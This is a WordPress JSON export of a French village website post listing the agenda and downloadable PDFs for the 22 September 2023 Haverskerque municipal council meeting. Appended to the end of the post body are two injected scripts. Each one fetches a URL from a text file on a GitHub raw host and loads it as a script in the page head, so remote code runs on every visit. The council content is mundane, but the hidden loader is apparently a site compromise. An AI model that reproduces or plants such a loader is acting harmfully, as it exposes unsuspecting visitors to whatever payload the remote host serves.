{"id":4836,"date":"2023-09-23T10:57:03","date_gmt":"2023-09-23T08:57:03","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=4836"},"modified":"2024-07-29T06:38:04","modified_gmt":"2024-07-29T04:38:04","slug":"conseil-municipal-du-22-septembre-2023","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/","title":{"rendered":"Conseil municipal du 22 septembre 2023"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u00c9lection du secr\u00e9taire de s\u00e9ance.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Approbation du proc\u00e8s-verbal du conseil municipal du 9 juin 2023.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Informations de d\u00e9cisions du maire dans le cadre de ses d\u00e9l\u00e9gations.<\/li>\n<\/ul>\n\n\n\n<p><strong>INSTITUTION<\/strong><\/p>\n\n\n\n<p>1. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation des membres.<\/p>\n\n\n\n<p><strong>FINANCES &amp; FISCALITE<\/strong><\/p>\n\n\n\n<p>2. Fixation du taux de la taxe d\u2019am\u00e9nagement pour 2023.<\/p>\n\n\n\n<p>3. Subvention pour la commune de Saint-Venant.<\/p>\n\n\n\n<p>4. Attribution de tickets de man\u00e8ge aux enfants de la commune ou scolaris\u00e9s \u00e0 l\u2019\u00e9cole Antoine de Saint-Exup\u00e9ry, \u00e2g\u00e9s de 3 \u00e0 14 ans.<\/p>\n\n\n\n<p>5. SIECF &#8211; groupement de commandes pour l\u2019achat d\u2019\u00e9nergie, de fournitures et de services en mati\u00e8re d\u2019efficacit\u00e9 \u00e9nerg\u00e9tique &#8211; avenant n\u00b03.<\/p>\n\n\n\n<p><strong>ADMINISTRATION<\/strong><\/p>\n\n\n\n<p>6. Modification des statuts du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre).<\/p>\n\n\n\n<p>7. Objet&nbsp;: p\u00e9rim\u00e8tre du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre) &#8211; d\u00e9part de la commune de LES MOERES.<\/p>\n\n\n\n<p><strong>RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>8. Attribution des ch\u00e8ques cadeaux aux agents.<\/p>\n\n\n\n<p>9. Intervention musicale en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024.<\/p>\n\n\n\n<p>10. Intervention sportive en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024.<\/p>\n\n\n\n<p>11. Objet&nbsp;: activit\u00e9 extrascolaire &#8211; recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2023-2024.<\/p>\n\n\n\n<p><strong>INTERCOMMUNALITE<\/strong><\/p>\n\n\n\n<p>12. Mise \u00e0 disposition d\u2019une parcelle au profit de la CCFL pour la construction d\u2019un parking &#8211; Bail emphyt\u00e9otique.<\/p>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a9c3c0f3-4f4d-4671-91d2-b4f88d1ff4ad\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/convocation-CM-22-09-2023.pdf\">convocation-CM-22-09-2023<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/convocation-CM-22-09-2023.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a9c3c0f3-4f4d-4671-91d2-b4f88d1ff4ad\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-8fa66908-1838-496d-a743-91f03f31c4c8\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/PROCES-VERBAL-CM-220923.pdf\">PROCES-VERBAL-CM-220923<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/PROCES-VERBAL-CM-220923.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-8fa66908-1838-496d-a743-91f03f31c4c8\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c76f4622-77ce-4efe-a35c-f92dfc39c4f8\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/1.-Commission-de-controle-des-listes-electorales-Designation-des-membres.pdf\">1.-Commission-de-controle-des-listes-electorales-Designation-des-membres<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/1.-Commission-de-controle-des-listes-electorales-Designation-des-membres.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c76f4622-77ce-4efe-a35c-f92dfc39c4f8\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-cc85a3ec-14d3-4b0d-b973-8f4feaf28d15\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/2.-Fixation-du-taux-de-la-taxe-damenagement-pour-2023.pdf\">2.-Fixation-du-taux-de-la-taxe-damenagement-pour-2023<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/2.-Fixation-du-taux-de-la-taxe-damenagement-pour-2023.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-cc85a3ec-14d3-4b0d-b973-8f4feaf28d15\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-9836d4aa-a89d-43c1-b1d4-04f3b62fcb48\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/3.-Subvention-pour-la-commune-de-Saint-Venant.pdf\">3.-Subvention-pour-la-commune-de-Saint-Venant<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/3.-Subvention-pour-la-commune-de-Saint-Venant.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-9836d4aa-a89d-43c1-b1d4-04f3b62fcb48\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-d49982be-28c6-4702-9223-96d89f73c936\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/4.-Attribution-de-tickets-de-manege-aux-enfants-de-la-commune-ou-scolarises-a-lecole-Antoine-de-Saint-Exupery-ages-de-3-a-14-ans.pdf\">4.-Attribution-de-tickets-de-manege-aux-enfants-de-la-commune-ou-scolarises-a-lecole-Antoine-de-Saint-Exupery-ages-de-3-a-14-ans<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/4.-Attribution-de-tickets-de-manege-aux-enfants-de-la-commune-ou-scolarises-a-lecole-Antoine-de-Saint-Exupery-ages-de-3-a-14-ans.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d49982be-28c6-4702-9223-96d89f73c936\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c860034b-841e-4058-bfa6-1e913c3afae6\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/5.-SIECF-groupement-de-commandes-pour-lachat-denergie-de-fournitures-et-de-services-en-matiere-defficacite-energetique-avenant-n\u00b03.pdf\">5.-SIECF-groupement-de-commandes-pour-lachat-denergie-de-fournitures-et-de-services-en-matiere-defficacite-energetique-avenant-n\u00b03<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/5.-SIECF-groupement-de-commandes-pour-lachat-denergie-de-fournitures-et-de-services-en-matiere-defficacite-energetique-avenant-n\u00b03.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c860034b-841e-4058-bfa6-1e913c3afae6\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-8abf8875-3a0d-4184-b554-054834de3c3f\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/6.-Modification-des-statuts-du-syndicat-intercommunal-denergie-des-communes-de-Flandre-SIECF-territoire-denergie-Flandre-te-Flandre.pdf\">6.-Modification-des-statuts-du-syndicat-intercommunal-denergie-des-communes-de-Flandre-SIECF-territoire-denergie-Flandre-te-Flandre<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/6.-Modification-des-statuts-du-syndicat-intercommunal-denergie-des-communes-de-Flandre-SIECF-territoire-denergie-Flandre-te-Flandre.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-8abf8875-3a0d-4184-b554-054834de3c3f\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-4da536c6-29d3-4463-a4f7-a9c75430148e\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/7.-Perimetre-du-syndicat-intercommunal-denergie-des-communes-de-Flandre-SIECF-territoire-denergie-Flandre-te-Flandre-depart-de-la-commune-de-LES-MOERES.pdf\">7.-Perimetre-du-syndicat-intercommunal-denergie-des-communes-de-Flandre-SIECF-territoire-denergie-Flandre-te-Flandre-depart-<br>de-la-commune-de-LES-MOERES<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/7.-Perimetre-du-syndicat-intercommunal-denergie-des-communes-de-Flandre-SIECF-territoire-denergie-Flandre-te-Flandre-depart-de-la-commune-de-LES-MOERES.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-4da536c6-29d3-4463-a4f7-a9c75430148e\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-2eb69607-4294-4162-a97d-0a0c68804c00\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/8.-Attribution-des-cheques-cadeaux-aux-agents.pdf\">8.-Attribution-des-cheques-cadeaux-aux-agents<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/8.-Attribution-des-cheques-cadeaux-aux-agents.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-2eb69607-4294-4162-a97d-0a0c68804c00\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-eb290e21-1f2c-4bfb-9b70-fa5c7fe121a1\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/9.-Intervention-musicale-en-milieu-scolaire-recrutement-et-remuneration-pour-lannee-scolaire-2023-2024.pdf\">9.-Intervention-musicale-en-milieu-scolaire-recrutement-et-remuneration-pour-lannee-scolaire-2023-2024<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/9.-Intervention-musicale-en-milieu-scolaire-recrutement-et-remuneration-pour-lannee-scolaire-2023-2024.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-eb290e21-1f2c-4bfb-9b70-fa5c7fe121a1\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-9ae6e12f-1271-4b38-9351-82c25beb92ed\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/10.-Intervention-sportive-en-milieu-scolaire-recrutement-et-remuneration-pour-lannee-scolaire-2023-2024.pdf\">10.-Intervention-sportive-en-milieu-scolaire-recrutement-et-remuneration-pour-lannee-scolaire-2023-2024<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/10.-Intervention-sportive-en-milieu-scolaire-recrutement-et-remuneration-pour-lannee-scolaire-2023-2024.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-9ae6e12f-1271-4b38-9351-82c25beb92ed\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-1d4d49c3-02a6-4463-99ee-2045c2415814\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/11.-Activite-extrascolaire-recrutement-et-remuneration-des-intervenants-danse-pour-lannee-scolaire-2023-2024.pdf\">11.-Activite-extrascolaire-recrutement-et-remuneration-des-intervenants-danse-pour-lannee-scolaire-2023-2024<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/11.-Activite-extrascolaire-recrutement-et-remuneration-des-intervenants-danse-pour-lannee-scolaire-2023-2024.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-1d4d49c3-02a6-4463-99ee-2045c2415814\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-213013a3-0d9a-4864-9254-7584697b1eb4\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/12.-Mise-a-disposition-dune-parcelle-au-profit-de-la-CCFL-pour-la-construction-dun-parking-Bail-emphyteotique.pdf\">12.-Mise-a-disposition-dune-parcelle-au-profit-de-la-CCFL-pour-la-construction-dun-parking-Bail-emphyteotique<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/10\/12.-Mise-a-disposition-dune-parcelle-au-profit-de-la-CCFL-pour-la-construction-dun-parking-Bail-emphyteotique.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-213013a3-0d9a-4864-9254-7584697b1eb4\">T\u00e9l\u00e9charger<\/a><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR INSTITUTION 1. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation des membres. FINANCES &amp; FISCALITE 2. Fixation du taux de la taxe d\u2019am\u00e9nagement pour 2023. 3. Subvention pour la commune de Saint-Venant. 4. Attribution de tickets de man\u00e8ge aux enfants de la commune ou scolaris\u00e9s \u00e0 l\u2019\u00e9cole Antoine de Saint-Exup\u00e9ry, \u00e2g\u00e9s de 3 \u00e0 14 ans. 5. SIECF &#8211; groupement de commandes pour l\u2019achat d\u2019\u00e9nergie, de fournitures et de services en mati\u00e8re d\u2019efficacit\u00e9 \u00e9nerg\u00e9tique &#8211; avenant n\u00b03. ADMINISTRATION 6. Modification des statuts du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre). 7. Objet&nbsp;: p\u00e9rim\u00e8tre du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre) &#8211; d\u00e9part de la commune de LES MOERES. RESSOURCES HUMAINES 8. Attribution des ch\u00e8ques cadeaux aux agents. 9. Intervention musicale en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024. 10. Intervention sportive en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024. 11. Objet&nbsp;: activit\u00e9 extrascolaire &#8211; recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2023-2024. INTERCOMMUNALITE 12. Mise \u00e0 disposition d\u2019une parcelle au profit de la CCFL pour la construction d\u2019un parking &#8211; Bail emphyt\u00e9otique.<\/p>\n","protected":false},"author":2,"featured_media":1476,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-4836","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil municipal du 22 septembre 2023 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil municipal du 22 septembre 2023 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR INSTITUTION 1. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation des membres. FINANCES &amp; FISCALITE 2. Fixation du taux de la taxe d\u2019am\u00e9nagement pour 2023. 3. Subvention pour la commune de Saint-Venant. 4. Attribution de tickets de man\u00e8ge aux enfants de la commune ou scolaris\u00e9s \u00e0 l\u2019\u00e9cole Antoine de Saint-Exup\u00e9ry, \u00e2g\u00e9s de 3 \u00e0 14 ans. 5. SIECF &#8211; groupement de commandes pour l\u2019achat d\u2019\u00e9nergie, de fournitures et de services en mati\u00e8re d\u2019efficacit\u00e9 \u00e9nerg\u00e9tique &#8211; avenant n\u00b03. ADMINISTRATION 6. Modification des statuts du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre). 7. Objet&nbsp;: p\u00e9rim\u00e8tre du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre) &#8211; d\u00e9part de la commune de LES MOERES. RESSOURCES HUMAINES 8. Attribution des ch\u00e8ques cadeaux aux agents. 9. Intervention musicale en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024. 10. Intervention sportive en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024. 11. Objet&nbsp;: activit\u00e9 extrascolaire &#8211; recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2023-2024. INTERCOMMUNALITE 12. Mise \u00e0 disposition d\u2019une parcelle au profit de la CCFL pour la construction d\u2019un parking &#8211; Bail emphyt\u00e9otique.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-23T08:57:03+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"445\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Communication\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Communication\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/\"},\"author\":{\"name\":\"Communication\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/aafb858b21dd4f2d37a7ab8c59b836ad\"},\"headline\":\"Conseil municipal du 22 septembre 2023\",\"datePublished\":\"2023-09-23T08:57:03+00:00\",\"dateModified\":\"2024-07-29T04:38:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/\"},\"wordCount\":314,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/03\\\/conseil_municipal-800x445-1.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/\",\"name\":\"Conseil municipal du 22 septembre 2023 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/03\\\/conseil_municipal-800x445-1.jpg\",\"datePublished\":\"2023-09-23T08:57:03+00:00\",\"dateModified\":\"2024-07-29T04:38:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/09\\\/23\\\/conseil-municipal-du-22-septembre-2023\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil municipal du 22 septembre 2023\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/aafb858b21dd4f2d37a7ab8c59b836ad\",\"name\":\"Communication\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"caption\":\"Communication\"},\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/clement\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil municipal du 22 septembre 2023 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil municipal du 22 septembre 2023 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR INSTITUTION 1. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation des membres. FINANCES &amp; FISCALITE 2. Fixation du taux de la taxe d\u2019am\u00e9nagement pour 2023. 3. Subvention pour la commune de Saint-Venant. 4. Attribution de tickets de man\u00e8ge aux enfants de la commune ou scolaris\u00e9s \u00e0 l\u2019\u00e9cole Antoine de Saint-Exup\u00e9ry, \u00e2g\u00e9s de 3 \u00e0 14 ans. 5. SIECF &#8211; groupement de commandes pour l\u2019achat d\u2019\u00e9nergie, de fournitures et de services en mati\u00e8re d\u2019efficacit\u00e9 \u00e9nerg\u00e9tique &#8211; avenant n\u00b03. ADMINISTRATION 6. Modification des statuts du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre). 7. Objet&nbsp;: p\u00e9rim\u00e8tre du syndicat intercommunal d\u2019\u00e9nergie des communes de Flandre (SIECF) territoire d\u2019\u00e9nergie Flandre (te Flandre) &#8211; d\u00e9part de la commune de LES MOERES. RESSOURCES HUMAINES 8. Attribution des ch\u00e8ques cadeaux aux agents. 9. Intervention musicale en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024. 10. Intervention sportive en milieu scolaire &#8211; recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2023-2024. 11. Objet&nbsp;: activit\u00e9 extrascolaire &#8211; recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2023-2024. INTERCOMMUNALITE 12. Mise \u00e0 disposition d\u2019une parcelle au profit de la CCFL pour la construction d\u2019un parking &#8211; Bail emphyt\u00e9otique.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/","og_site_name":"Haverskerque, 100% Nature 